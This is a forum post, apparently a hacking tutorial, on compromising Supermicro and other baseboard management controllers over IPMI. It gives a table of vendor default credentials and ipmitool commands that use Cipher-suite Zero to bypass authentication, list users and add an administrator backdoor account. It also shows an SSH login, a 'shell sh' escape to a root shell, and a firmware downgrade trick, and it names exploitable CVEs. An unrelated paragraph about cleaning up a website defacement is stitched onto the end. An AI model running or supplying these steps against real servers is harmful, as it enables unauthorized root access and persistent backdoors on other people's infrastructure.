Baseboard Management Controllers (BMCs) are a type of embedded system present on the motherboard that monitors host system variables such as power, fan speed, temperature, voltage, and humidity. Exploiting these embedded devices is a good way to gain a foothold on a target system.
Enjoy
Exploiting Supermicro and other BCM Embedded SystemsBCMs and Governing ProtocolBaseboard management controllers (BMCs) are a class of embedded computers used to provide monitoring for servers and workstations. They are generally implemented in embedded ARM systems and connected to the south bridge of the host system's motherboard. Network access is achieved either via dedicated interface or sideband onto an existing interface. Almost all workstations and servers come with some sort of support for BMCs which can also be bought as a PCI expansion or pluggable module.
IPMI, which is short for “Intelligent Platform Management Interface,” is the collection of protocols that govern communications across the local system bus as well as the network. IPMI's current default port is 623, however boxes running IPMI can also be detected if port 49152 is open. And to all those who haven't checked yet, Metasploit has numerous modules to aid in the detection and exploitation of IPMI. Of course you don't need to utilize these modules to hack this gibson. Exploiting these things manually gives one a better understanding of how all this works. Don't get me wrong, Metasploit is a great tool and definitely has it's purposes. However, it can become a hindrance when used as a solution in a learning environment. Below I introduce the first, and admittedly obvious, method of exploiting this service.
Guessing PasswordsLike the common household wireless router, default passwords are not often changed on these boxes. This means one can use the convenient chart below to guess passwords once you have identified a target.
Module Username Password
---------------------------------------------------------------------------------
Dell Drac/iDrac root calvin
IBM IMM USERID PASSW0RD
Supermicro IPMI ADMIN ADMIN
Fujtisu admin admin
Oracle ILOM root changeme
Asus iKVM admin admin
I purposely left out the HP iLO, since HP was smart enough to realize that lazy sys-admins are most likely going to forget or just not care enough to actually change the default password, so they set it to a randomized 8-character string which would mitigate some of the problems, if not Cypher-suite Zero.
Cypher-suite ZeroOf course Metasploit has a module for this, but we are going to go ahead and ignore that because it completely defeats the purpose of learning. With IPMI 2.0 came cryptography, as well as a way to completely bypass authentication. Cypher-suite Zero allows any user on the system to completely bypass authentication. This does require having knowledge of a valid user account on the system, which is no problem considering we have a bunch of default accounts to try. To pull off this hack we will use a cli tool called ipmitool.
To get a feel for the syntax, below is an example ipmitool command that uses Cypher-suite Zero to get a list of users on the system.
# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user list
Lets pick this command apart to see what it is doing:
-I lanplus → this flag will specify we want to use IPMI version 2.0
-C 0 → this flag specifies that we are using Cypher-suite Zero
-H xx.xx.xx.xx → this flag specifies the target host
-U → self explanatory, this flag specifies the username
-P → self explanatory, this flag specifies the password (Fake password in this case).
user list → this is the command that will be executed to list the current users on the host.
Now that we have extracted a list of users from the target, lets see if we can add a new user to the system. We will accomplish this with the following command:
# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user set name 9 voodoo
# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user set password 9 s3cU17y
In the above command-line, we use the command “user set” to set a user with UID of 9 and name of voodoo. It is worth mentioning that the UID must be unique per user. I chose 9 arbitrarily as an example. But since there were only two accounts on the system I could have used a UID of 3. We then used the “user set password” command to set the password on our new user identified by the UID 9.
Can I Haz Admin?Now that we have added a user, the next logical step is to see if we can give that user any privileges. Fortunately, there is a command for that which reads:
# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user priv 9 4
# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user enable 9
As you can see, we have leveraged our access to set privileges to 4 (i.e., Administrator), and then enabled our account. But hey this doesn't really do anything, all we have access to is a dumb web UI and a few simple commands. Not quite. Recall that BMCs generally offer a web management UI as well as an SSH tunnel for management. If we try to ssh into the server using our newly created user account, you will find that you now have a shell on the BMC.
[voodoo@spaceghost]# ssh voodoo@192.168.207.116
The authenticity of host '192.168.207.116 (192.168.207.116)' can't be established.
RSA key fingerprint is 21:0e:54:f2:0c:d8:bc:a1:1c:72:e0:3b:e9:ae:f9:82.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.207.116' (RSA) to the list of known hosts.
voodoo@192.168.207.116's password:
ATEN SMASH-CLP System Management Shell, version 1.02
Copyright (c) 2008-2009 by ATEN International CO., Ltd.
All Rights Reserved
→
Digging furtherWhile we still have yet to cover all the methods one can use to back-door a BMC module, we will move forward and discuss methods further exploit a compromised BMC. Let's assume we have already identified a target running IPMI, exploited the BMC using Cypher-suite Zero, and have given ourselves a nice little back-door. What now? Where do we go from here? The current SMASH shell appears to be rather restricted and doesn't give us the flexibility we want. There are a few different methods we can use to get a better foothold on system the first of which being a hidden function of the BMC firmware.
As it turns out, in certain firmware versions, you can call “shell” from the current SMASH shell, which will allow for code execution on the remote machine. An example of this would be appending the command you want to execute on the end of the call to “shell”. For example, “shell pwd” would display the current working directory. Taking this a step further we can leverage this functionality to gain a root shell on the box by simply issuing the following command:
# shell sh
The above command escapes the SMASH shell and drops us into a root shell on the embedded system. If the firmware version has been updated on the BMC, escaping into a root shell via the above command will not work. However we do still have God powers on the BMC, so in this scenario, we can flash outdated firmware to the BMC and exploit the system through the same escape method. If all this seems just too easy, just wait because it gets even easier. We can also gain remote code execution through buffer overflow exploits due to poorly written code. I refer to CVE-2013-3621, CVE-2013-3623, and CVE-2013-3622 all of which are known exploits in the code for CGI applications available through the web interface. CVE-2013-3623 in particular refers to two buffer overflow vulnerabilities in close_window.cgi. Metasploit has an exploit that takes advantage of this CVE through which we can get a root shell on the system.
References:
https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilitieshttps://community.rapid7.com/community/metasploit/blog/2013/11/15/exploiting-the-supermicro-onboard-ipmi-controllerhttp://fish2.com/ipmi/cipherzero.htmlhttps://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmiHere is a link to my write up as well:
securityvoodoo.blogspot.com
Show Posts
the root web directory was left a total mess. Although the defacement was successful (which was just replacing the index.php file) none of the other attempts succeeded and the attacker failed to break out of the VM or leverage any authority on the system. Compressed the bad files and replaced the website and sql database with the backups, changed the ftp and sql passwords and *ta da* fixed.